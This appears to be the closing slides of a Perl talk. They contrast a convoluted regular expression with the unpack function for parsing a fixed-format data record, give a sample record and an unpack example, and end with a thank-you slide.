m/\d{3}\s\d{6}\W(\W{7})\s{4}(\W{10})\s{2}\d{2}\/\D{2}\/\d{2}\s(.{5,25})/; * The data had this format: 003 046926 MXF 08 1/1/5 $2,400,000 22/NO/00 4285 AN ADDRESS HERE C5D5 * This is a _fixed-format record_; the fields have fixed lengths * Perl's tool for dealing with fixed-format records is [[unpack]] ($vendor, $price, $address) = unpack "x11 A7 x4 A10 x11 A25", $line; ---------------------------------------------------------------- Thanks! ******* #IMG# beer.jpg ---------------------------------------------------------------- ----------------------------------------------------------------END